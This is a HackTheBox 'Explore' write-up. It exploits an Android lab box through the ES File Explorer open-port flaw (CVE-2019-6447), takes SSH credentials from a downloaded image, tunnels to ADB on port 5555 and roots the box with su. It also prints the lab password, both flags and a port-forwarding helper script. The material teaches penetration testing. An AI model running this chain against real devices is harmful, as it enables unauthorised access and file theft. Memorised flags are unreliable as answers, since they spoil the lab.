HackTheBox: Explore
HTB - EXPLORE (Android-Machine)
Enumeration
Machine IP
export IP=10.10.10.247
Nmap Scan Results
Nmap may take some time to scan all 65535 ports,
so we will use Rustscan for the initial port discovery.
Using Rustscan to Find all open ports
rustscan -a 10.10.10.247
Open 10.10.10.247:2222
Open 10.10.10.247:37721
Open 10.10.10.247:59777
- Now use Nmap to fingerprint these open ports
nmap -p 2222,37721,59777 10.10.10.247 -vvv -sV -A -sC
PORT STATE SERVICE REASON VERSION
2222/tcp open ssh syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
| 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqK2WZkEVE0CPTPpWoyDKZkHVrmffyDgcNNVK3PkamKs3M8tyqeFBivz4o8i9Ai8UlrVZ8mztI3qb+cHCdLMDpaO0ghf/50qYVGH4gU5vuVN0tbBJAR67ot4U+7WCcdh4sZHX5NNatyE36wpKj9t7n2XpEmIYda4CEIeUOy2Mm3Es+GD0AAUl8xG4uMYd2rdrJrrO1p15PO97/1ebsTH6SgFz3qjZvSirpom62WmmMbfRvJtNFiNJRydDpJvag2urk16GM9a0buF4h1JCGwMHxpSY05aKQLo8shdb9SxJRa9lMu3g2zgiDAmBCoKjsiPnuyWW+8G7Vz7X6nJC87KpL
37721/tcp open unknown syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sat, 11 Sep 2021 12:57:56 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sat, 11 Sep 2021 12:57:56 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sat, 11 Sep 2021 12:58:02 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sat, 11 Sep 2021 12:58:20 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sat, 11 Sep 2021 12:58:02 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 11 Sep 2021 12:58:20 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 11 Sep 2021 12:58:21 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sat, 11 Sep 2021 12:58:21 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http syn-ack ttl 63 Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Summary of the open ports:
PORT STATE SERVICE REASON VERSION
2222/tcp open ssh syn-ack ttl 63 (protocol 2.0)/SSH-2.0-SSH Server - Banana Studio
37721/tcp open unknown syn-ack ttl 63
59777/tcp open http syn-ack ttl 63 Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Using the Nmap OS detection (-A) we can also figure out that this is an Android machine. The banner on port 2222, "SSH Server - Banana Studio", is the Android SSH server app of that name, so we have an SSH service to come back to once we find credentials.
EXPLOITATION
After further research about port 59777 on Android devices, we found that it is the port opened by the built-in HTTP server of ES File Explorer, which is vulnerable to CVE-2019-6447: versions up to 4.1.9.7.4 accept unauthenticated JSON commands on this port and let anyone who can reach it list and download files from the device. Note that Nmap's "Bukkit JSONAPI httpd for Minecraft" label is a misidentification based on the plain-text HTTP responses, so the version banner should not be trusted here.
We can find a public exploit for this CVE on Exploit-DB and GitHub:
https://www.exploit-db.com/exploits/50070
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
- We will use the Exploit-DB exploit code.
python3 exploit.py listFiles 10.10.10.247
It lists all the files present; nothing interesting here.
Let's check the available pictures instead:
python3 exploit.py listPics 10.10.10.247
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
Found an interesting file: creds.jpg. Let's get this file:
python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
[+] Downloading file...
[+] Done. Saved as `out.dat`.
mv out.dat creds.jpg
- Opening the image shows it contains an SSH username and password:
kristi:Kr1sT!5h@Rp3xPl0r3!
GETTING USER ACCESS / USER FLAG
- Let's SSH into the machine:
ssh kristi@10.10.10.247 -p 2222
- We can find the User Flag at
/sdcard/user.txt
f32017174c7c7e8f50c6da52891ae250
PRIVILEGE ESCALATION
Enumerating further as this user, we found several ports listening on the machine that were not visible from the outside.
Listing all listening sockets with netstat -a:
:/sdcard $ netstat -a
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp6 0 0 localhost:37509 :::* LISTEN
tcp6 0 0 ::ffff:10.10.10.2:38989 :::* LISTEN
tcp6 0 0 :::2222 :::* LISTEN
tcp6 0 0 :::5555 :::* LISTEN
tcp6 0 0 :::42135 :::* LISTEN
tcp6 0 0 :::59777 :::* LISTEN
Further research shows that
PORT 5555
is the default ADB (Android Debug Bridge) TCP port. It is listening on the device but was not among the ports reachable from outside in our scan, so we forward it to our attacker machine with SSH local port forwarding, using the SSH credentials we already have.
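The check done by hand above (compare what the box listens on with what the external scan reached, then tunnel the difference) is worth automating on every foothold. Below is an added example written for this writeup, not a tool from the original page: it parses the `netstat -a` output, reports the ports that were not externally reachable, and prints the `ssh -L` line for each. NETSTAT_OUTPUT is a constructed copy of the lines above, EXTERNAL_OPEN is what rustscan found, and the KNOWN labels and forward defaults (user, host, SSH port) are assumptions taken from this box.

```python
"""Spot pivot candidates: ports the box listens on that the external scan
did not reach, and the SSH local forward needed to bring each one home.

Added example for this writeup, not part of the original page. NETSTAT_OUTPUT
is a constructed copy of the `netstat -a` lines above and EXTERNAL_OPEN is
what rustscan found from the attacker side; the user/host/port defaults of
the forward and the KNOWN labels are assumptions taken from this box.
"""
import re
import socket

NETSTAT_OUTPUT = """\
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp6 0 0 localhost:37509 :::* LISTEN
tcp6 0 0 ::ffff:10.10.10.2:38989 :::* LISTEN
tcp6 0 0 :::2222 :::* LISTEN
tcp6 0 0 :::5555 :::* LISTEN
tcp6 0 0 :::42135 :::* LISTEN
tcp6 0 0 :::59777 :::* LISTEN
"""
EXTERNAL_OPEN = {2222, 37721, 59777}          # rustscan result from outside
LOOPBACK = {"localhost", "127.0.0.1", "::1", "ip6-localhost"}
KNOWN = {                                      # assumed labels for this box
    2222: "ssh (Banana Studio)",
    5555: "adb (Android Debug Bridge)",
    59777: "ES File Explorer HTTP",
}

# netstat -a rows look like: tcp6 0 0 localhost:37509 :::* LISTEN
LISTEN_RE = re.compile(r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+)\s+\S+\s+LISTEN\s*$")


def _port(token):
    """Numeric port from the tail of 'addr:port'; resolve names like 'ssh'."""
    try:
        return int(token)
    except ValueError:
        return socket.getservbyname(token)


def parse_listeners(text):
    """{port: bind address} for every LISTEN socket in netstat -a output."""
    listeners = {}
    for line in text.splitlines():
        m = LISTEN_RE.match(line.strip())
        if not m:
            continue
        # rpartition keeps IPv6 addresses such as ::ffff:10.10.10.2 intact
        addr, _, port = m.group(2).rpartition(":")
        listeners[_port(port)] = addr
    return listeners


def pivot_candidates(listeners, external_open):
    """Ports listening on the box that were not reachable from outside."""
    return {p: a for p, a in sorted(listeners.items()) if p not in external_open}


def forward_command(remote_port, user="kristi", host="10.10.10.247",
                    ssh_port=2222, local_port=None):
    """ssh -L line that exposes a remote port on the attacker's loopback."""
    local_port = local_port or remote_port
    return (f"ssh -N -L {local_port}:localhost:{remote_port} "
            f"-p {ssh_port} {user}@{host}")


def report(text=NETSTAT_OUTPUT, external_open=EXTERNAL_OPEN):
    """One line per pivot candidate: port, label, bind scope, forward command."""
    lines = []
    for port, addr in pivot_candidates(parse_listeners(text), external_open).items():
        scope = "loopback only" if addr in LOOPBACK else f"bound to {addr}"
        label = KNOWN.get(port, "unknown")
        lines.append(f"{port:>5}  {label:<28} {scope:<26} {forward_command(port)}")
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```

Ports bound to `::` that still did not answer the external scan (5555 and 42135 here) are the ones a host firewall or the lab network is hiding from us, which is exactly why the ADB port has to come in through the SSH tunnel rather than a direct `adb connect 10.10.10.247:5555`.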
SSH PORT FORWARDING
- Using the command
ssh kristi@10.10.10.247 -L 5555:localhost:5555 -p 2222
- Now let's connect to port 5555 through the tunnel using ADB
adb connect localhost:5555
- List Connected Devices
adb devices
- Getting a shell (adb labels a connection to localhost:5555 as emulator-5554, which is why the -s form below also works)
adb shell
OR
adb -s emulator-5554 shell
- From the adb shell, su switches us to root and we can read the root flag
su
cat /data/root.txt
- Root Flag
f04fc82b6d49b41c9b08982be59338c5